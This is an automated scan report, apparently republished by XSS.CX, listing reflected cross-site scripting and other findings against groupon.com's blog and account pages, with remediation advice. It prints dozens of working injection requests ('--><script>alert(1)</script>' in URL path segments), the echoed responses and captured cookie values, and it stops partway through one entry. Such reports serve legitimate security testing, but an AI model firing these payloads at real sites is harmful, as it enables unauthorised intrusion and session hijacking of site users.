XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, www.groupon.com/blog/wp-content/themes/groublogpon/favicon.ico DORK: PHP 5.2.6, /wp-content/themes/, /favicon.ico Report generated by XSS.CX at Sat Aug 20 06:09:52 GMT-06:00 2011. Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search
XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler | Loading
1. Cross-site scripting (reflected)
1.1. http://www.groupon.com/blog/3rd-person/ [REST URL parameter 2]
1.2. http://www.groupon.com/blog/cities/behind-the-deals-recycling/ [REST URL parameter 2]
1.3. http://www.groupon.com/blog/cities/behind-the-deals-recycling/ [REST URL parameter 3]
1.4. http://www.groupon.com/blog/g-oodies/ [REST URL parameter 2]
1.5. http://www.groupon.com/blog/wp-content/themes/groublogpon/favicon.ico [REST URL parameter 2]
1.6. http://www.groupon.com/blog/wp-content/themes/groublogpon/favicon.ico [REST URL parameter 3]
1.7. http://www.groupon.com/blog/wp-content/themes/groublogpon/favicon.ico [REST URL parameter 4]
1.8. http://www.groupon.com/blog/wp-content/themes/groublogpon/favicon.ico [REST URL parameter 5]
1.9. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/builder.js [REST URL parameter 2]
1.10. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/builder.js [REST URL parameter 3]
1.11. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/builder.js [REST URL parameter 4]
1.12. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/builder.js [REST URL parameter 5]
1.13. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/builder.js [REST URL parameter 6]
1.14. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/controls.js [REST URL parameter 2]
1.15. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/controls.js [REST URL parameter 3]
1.16. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/controls.js [REST URL parameter 4]
1.17. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/controls.js [REST URL parameter 5]
1.18. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/controls.js [REST URL parameter 6]
1.19. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/dragdrop.js [REST URL parameter 2]
1.20. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/dragdrop.js [REST URL parameter 3]
1.21. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/dragdrop.js [REST URL parameter 4]
1.22. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/dragdrop.js [REST URL parameter 5]
1.23. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/dragdrop.js [REST URL parameter 6]
1.24. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/slider.js [REST URL parameter 2]
1.25. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/slider.js [REST URL parameter 3]
1.26. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/slider.js [REST URL parameter 4]
1.27. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/slider.js [REST URL parameter 5]
1.28. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/slider.js [REST URL parameter 6]
1.29. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/sound.js [REST URL parameter 2]
1.30. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/sound.js [REST URL parameter 3]
1.31. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/sound.js [REST URL parameter 4]
1.32. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/sound.js [REST URL parameter 5]
1.33. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/sound.js [REST URL parameter 6]
1.34. http://www.groupon.com/users/send_password_reset [user%5Bemail_address%5D parameter]
2. Flash cross-domain policy
3. Cookie scoped to parent domain
3.1. http://www.groupon.com/
3.2. http://www.groupon.com/about
3.3. http://www.groupon.com/ch/getaways/subscriptions/new
3.4. http://www.groupon.com/dallas/all
3.5. http://www.groupon.com/g-team
3.6. http://www.groupon.com/getaways
3.7. http://www.groupon.com/jobs
3.8. http://www.groupon.com/learn
3.9. http://www.groupon.com/merchants/welcome
3.10. http://www.groupon.com/mobile
3.11. http://www.groupon.com/now
3.12. http://www.groupon.com/pages/affiliates
3.13. http://www.groupon.com/pages/api
3.14. http://www.groupon.com/pages/corporate-gift-cards
3.15. http://www.groupon.com/pages/groupon-jobs-frameresize
3.16. http://www.groupon.com/personalize
3.17. http://www.groupon.com/press
3.18. http://www.groupon.com/subscriptions/new
3.19. http://www.groupon.com/users/forgot_password
3.20. http://www.groupon.com/users/send_password_reset
3.21. http://www.groupon.com/widget
4. Cross-domain Referer leakage
4.1. http://www.groupon.com/pages/groupon-jobs-frameresize
4.2. http://www.groupon.com/subscriptions/new
5. Cross-domain script include
5.1. http://www.groupon.com/about
5.2. http://www.groupon.com/blog/
5.3. http://www.groupon.com/blog/cities/behind-the-deals-recycling/
5.4. http://www.groupon.com/ch/getaways/subscriptions/new
5.5. http://www.groupon.com/dallas/
5.6. http://www.groupon.com/dallas/all
5.7. http://www.groupon.com/g-team
5.8. http://www.groupon.com/jobs
5.9. http://www.groupon.com/learn
5.10. http://www.groupon.com/merchants/welcome
5.11. http://www.groupon.com/mobile
5.12. http://www.groupon.com/now
5.13. http://www.groupon.com/pages/affiliates
5.14. http://www.groupon.com/pages/api
5.15. http://www.groupon.com/pages/corporate-gift-cards
5.16. http://www.groupon.com/pages/groupon-jobs-frameresize
5.17. http://www.groupon.com/press
5.18. http://www.groupon.com/subscriptions/new
5.19. http://www.groupon.com/users/forgot_password
5.20. http://www.groupon.com/users/send_password_reset
5.21. http://www.groupon.com/widget
6. Cookie without HttpOnly flag set
6.1. http://www.groupon.com/
6.2. http://www.groupon.com/about
6.3. http://www.groupon.com/ch/getaways/subscriptions/new
6.4. http://www.groupon.com/dallas/all
6.5. http://www.groupon.com/g-team
6.6. http://www.groupon.com/getaways
6.7. http://www.groupon.com/jobs
6.8. http://www.groupon.com/learn
6.9. http://www.groupon.com/merchants/welcome
6.10. http://www.groupon.com/mobile
6.11. http://www.groupon.com/now
6.12. http://www.groupon.com/pages/affiliates
6.13. http://www.groupon.com/pages/api
6.14. http://www.groupon.com/pages/corporate-gift-cards
6.15. http://www.groupon.com/pages/groupon-jobs-frameresize
6.16. http://www.groupon.com/personalize
6.17. http://www.groupon.com/press
6.18. http://www.groupon.com/subscriptions/new
6.19. http://www.groupon.com/users/forgot_password
6.20. http://www.groupon.com/users/send_password_reset
6.21. http://www.groupon.com/widget
7. Email addresses disclosed
7.1. http://www.groupon.com/about
7.2. http://www.groupon.com/blog/wp-content/plugins/events-calendar/js/jquery.bgiframe.js
7.3. http://www.groupon.com/pages/affiliates
7.4. http://www.groupon.com/pages/api
7.5. http://www.groupon.com/press
8. Robots.txt file
9. Content type incorrectly stated
9.1. http://www.groupon.com/blog/wp-content/themes/groublogpon/favicon.ico
9.2. http://www.groupon.com/deals/cairo-hookah-lounge/deal_status.json
1. Cross-site scripting (reflected)
next
There are 34 instances of this issue:
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised. User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
1.1. http://www.groupon.com/blog/3rd-person/ [REST URL parameter 2]
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/blog/3rd-person/
Issue detail
The value of REST URL parameter 2 is copied into an HTML comment. The payload 5f448--><script>alert(1)</script>a0cabb24ece was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /blog/3rd-person5f448--><script>alert(1)</script>a0cabb24ece / HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/blog/g-oodies/.340368620.1313841586.1313841586.1313841586.1; __utmb=172649589.4.10.1313841586; __utmc=172649589; __utmz=172649589.1313841586.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _chartbeat2=ts2s2t371e5yxuld
Response
HTTP/1.1 404 Not Found/blog/xmlrpc.php/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... /blog/3rd-person5f448--><script>alert(1)</script>a0cabb24ece / ) in 0.56461 seconds, on Aug 20th, 2011 at 12:03 pm UTC. -->...[SNIP]...
1.2. http://www.groupon.com/blog/cities/behind-the-deals-recycling/ [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/blog/cities/behind-the-deals-recycling/
Issue detail
The value of REST URL parameter 2 is copied into an HTML comment. The payload 2f86a--><script>alert(1)</script>a6c98d60efe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /blog/cities2f86a--><script>alert(1)</script>a6c98d60efe /behind-the-deals-recycling/ HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7.com/.340368620.1313841586.1313841586.1313841586.1; __utmb=172649589.2.10.1313841586; __utmc=172649589; __utmz=172649589.1313841586.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _chartbeat2=ts2s2t371e5yxuld
Response
HTTP/1.1 200 OK/blog/xmlrpc.php/blog/?p=5055>; rel=shortlink/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... /blog/cities2f86a--><script>alert(1)</script>a6c98d60efe /behind-the-deals-recycling/ ) in 0.48358 seconds, on Aug 20th, 2011 at 12:03 pm UTC. -->...[SNIP]...
1.3. http://www.groupon.com/blog/cities/behind-the-deals-recycling/ [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/blog/cities/behind-the-deals-recycling/
Issue detail
The value of REST URL parameter 3 is copied into an HTML comment. The payload fb08a--><script>alert(1)</script>99b30f5ad5d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /blog/cities/behind-the-deals-recyclingfb08a--><script>alert(1)</script>99b30f5ad5d / HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7.com/.340368620.1313841586.1313841586.1313841586.1; __utmb=172649589.2.10.1313841586; __utmc=172649589; __utmz=172649589.1313841586.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _chartbeat2=ts2s2t371e5yxuld
Response
HTTP/1.1 404 Not Found/blog/xmlrpc.php/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... /blog/cities/behind-the-deals-recyclingfb08a--><script>alert(1)</script>99b30f5ad5d / ) in 0.30292 seconds, on Aug 20th, 2011 at 12:03 pm UTC. -->...[SNIP]...
1.4. http://www.groupon.com/blog/g-oodies/ [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/blog/g-oodies/
Issue detail
The value of REST URL parameter 2 is copied into an HTML comment. The payload 3a3ed--><script>alert(1)</script>bf140a0adc4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /blog/g-oodies3a3ed--><script>alert(1)</script>bf140a0adc4 / HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7.com/?s=xss.340368620.1313841586.1313841586.1313841586.1; __utmb=172649589.3.10.1313841586; __utmc=172649589; __utmz=172649589.1313841586.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _chartbeat2=ts2s2t371e5yxuld
Response
HTTP/1.1 404 Not Found/blog/xmlrpc.php/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... /blog/g-oodies3a3ed--><script>alert(1)</script>bf140a0adc4 / ) in 0.53331 seconds, on Aug 20th, 2011 at 12:03 pm UTC. -->...[SNIP]...
1.5. http://www.groupon.com/blog/wp-content/themes/groublogpon/favicon.ico [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/blog/wp-content/themes/groublogpon/favicon.ico
Issue detail
The value of REST URL parameter 2 is copied into an HTML comment. The payload 52cfb--><script>alert(1)</script>49738ec2b22 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /blog/wp-content52cfb--><script>alert(1)</script>49738ec2b22 /themes/groublogpon/favicon.ico HTTP/1.1;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.936981430.1313841222.1313841222.1313841222.1; __utmb=44473723.5.10.1313841222; __utmc=44473723; __utmz=44473723.1313841222.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 404 Not Found/blog/xmlrpc.php/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... /blog/wp-content52cfb--><script>alert(1)</script>49738ec2b22 /themes/groublogpon/favicon.ico ) in 0.39594 seconds, on Aug 20th, 2011 at 11:59 am UTC. -->...[SNIP]...
1.6. http://www.groupon.com/blog/wp-content/themes/groublogpon/favicon.ico [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/blog/wp-content/themes/groublogpon/favicon.ico
Issue detail
The value of REST URL parameter 3 is copied into an HTML comment. The payload b6905--><script>alert(1)</script>1ee6cc7fbe4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /blog/wp-content/themesb6905--><script>alert(1)</script>1ee6cc7fbe4 /groublogpon/favicon.ico HTTP/1.1;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.936981430.1313841222.1313841222.1313841222.1; __utmb=44473723.5.10.1313841222; __utmc=44473723; __utmz=44473723.1313841222.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 404 Not Found/blog/xmlrpc.php/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... /blog/wp-content/themesb6905--><script>alert(1)</script>1ee6cc7fbe4 /groublogpon/favicon.ico ) in 0.37469 seconds, on Aug 20th, 2011 at 11:59 am UTC. -->...[SNIP]...
1.7. http://www.groupon.com/blog/wp-content/themes/groublogpon/favicon.ico [REST URL parameter 4]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/blog/wp-content/themes/groublogpon/favicon.ico
Issue detail
The value of REST URL parameter 4 is copied into an HTML comment. The payload dfa20--><script>alert(1)</script>9321a3c74cb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /blog/wp-content/themes/groublogpondfa20--><script>alert(1)</script>9321a3c74cb /favicon.ico HTTP/1.1;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.936981430.1313841222.1313841222.1313841222.1; __utmb=44473723.5.10.1313841222; __utmc=44473723; __utmz=44473723.1313841222.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 404 Not Found/blog/xmlrpc.php/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... /blog/wp-content/themes/groublogpondfa20--><script>alert(1)</script>9321a3c74cb /favicon.ico ) in 0.35594 seconds, on Aug 20th, 2011 at 11:59 am UTC. -->...[SNIP]...
1.8. http://www.groupon.com/blog/wp-content/themes/groublogpon/favicon.ico [REST URL parameter 5]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/blog/wp-content/themes/groublogpon/favicon.ico
Issue detail
The value of REST URL parameter 5 is copied into an HTML comment. The payload d3220--><script>alert(1)</script>aeca956d986 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /blog/wp-content/themes/groublogpon/favicon.icod3220--><script>alert(1)</script>aeca956d986 HTTP/1.1;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.936981430.1313841222.1313841222.1313841222.1; __utmb=44473723.5.10.1313841222; __utmc=44473723; __utmz=44473723.1313841222.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 404 Not Found/blog/xmlrpc.php/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... /blog/wp-content/themes/groublogpon/favicon.icod3220--><script>alert(1)</script>aeca956d986 ) in 0.29664 seconds, on Aug 20th, 2011 at 11:59 am UTC. -->...[SNIP]...
1.9. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/builder.js [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/blog/wp-content/themes/groublogpon/js/builder.js
Issue detail
The value of REST URL parameter 2 is copied into an HTML comment. The payload 1e241--><script>alert(1)</script>c62ae803393 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /blog/wp-content1e241--><script>alert(1)</script>c62ae803393 /themes/groublogpon/js/builder.js HTTP/1.1/blog/;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.12.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 404 Not Found/blog/xmlrpc.php/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... /blog/wp-content1e241--><script>alert(1)</script>c62ae803393 /themes/groublogpon/js/builder.js ) in 0.38601 seconds, on Aug 20th, 2011 at 11:58 am UTC. -->...[SNIP]...
1.10. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/builder.js [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/blog/wp-content/themes/groublogpon/js/builder.js
Issue detail
The value of REST URL parameter 3 is copied into an HTML comment. The payload 98aea--><script>alert(1)</script>4267495578f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /blog/wp-content/themes98aea--><script>alert(1)</script>4267495578f /groublogpon/js/builder.js HTTP/1.1/blog/;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.12.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 404 Not Found/blog/xmlrpc.php/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... /blog/wp-content/themes98aea--><script>alert(1)</script>4267495578f /groublogpon/js/builder.js ) in 0.43382 seconds, on Aug 20th, 2011 at 11:58 am UTC. -->...[SNIP]...
1.11. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/builder.js [REST URL parameter 4]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/blog/wp-content/themes/groublogpon/js/builder.js
Issue detail
The value of REST URL parameter 4 is copied into an HTML comment. The payload 1e431--><script>alert(1)</script>f2626e459f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /blog/wp-content/themes/groublogpon1e431--><script>alert(1)</script>f2626e459f /js/builder.js HTTP/1.1/blog/;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.12.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 404 Not Found/blog/xmlrpc.php/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... /blog/wp-content/themes/groublogpon1e431--><script>alert(1)</script>f2626e459f /js/builder.js ) in 0.36367 seconds, on Aug 20th, 2011 at 11:58 am UTC. -->...[SNIP]...
1.12. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/builder.js [REST URL parameter 5]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/blog/wp-content/themes/groublogpon/js/builder.js
Issue detail
The value of REST URL parameter 5 is copied into an HTML comment. The payload feb6b--><script>alert(1)</script>b103ac2a1a7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /blog/wp-content/themes/groublogpon/jsfeb6b--><script>alert(1)</script>b103ac2a1a7 /builder.js HTTP/1.1/blog/;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.12.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 404 Not Found/blog/xmlrpc.php/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... /blog/wp-content/themes/groublogpon/jsfeb6b--><script>alert(1)</script>b103ac2a1a7 /builder.js ) in 0.67961 seconds, on Aug 20th, 2011 at 11:58 am UTC. -->...[SNIP]...
1.13. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/builder.js [REST URL parameter 6]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/blog/wp-content/themes/groublogpon/js/builder.js
Issue detail
The value of REST URL parameter 6 is copied into an HTML comment. The payload d2a67--><script>alert(1)</script>c53499c3338 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /blog/wp-content/themes/groublogpon/js/builder.jsd2a67--><script>alert(1)</script>c53499c3338 HTTP/1.1/blog/;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.12.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 404 Not Found/blog/xmlrpc.php/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... /blog/wp-content/themes/groublogpon/js/builder.jsd2a67--><script>alert(1)</script>c53499c3338 ) in 0.62496 seconds, on Aug 20th, 2011 at 11:58 am UTC. -->...[SNIP]...
1.14. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/controls.js [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/blog/wp-content/themes/groublogpon/js/controls.js
Issue detail
The value of REST URL parameter 2 is copied into an HTML comment. The payload 9f146--><script>alert(1)</script>8ad772d5196 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /blog/wp-content9f146--><script>alert(1)</script>8ad772d5196 /themes/groublogpon/js/controls.js HTTP/1.1/blog/;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.12.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 404 Not Found/blog/xmlrpc.php/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... /blog/wp-content9f146--><script>alert(1)</script>8ad772d5196 /themes/groublogpon/js/controls.js ) in 0.34932 seconds, on Aug 20th, 2011 at 11:58 am UTC. -->...[SNIP]...
1.15. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/controls.js [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/blog/wp-content/themes/groublogpon/js/controls.js
Issue detail
The value of REST URL parameter 3 is copied into an HTML comment. The payload d5fe2--><script>alert(1)</script>c831d509b7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
Remediation detail
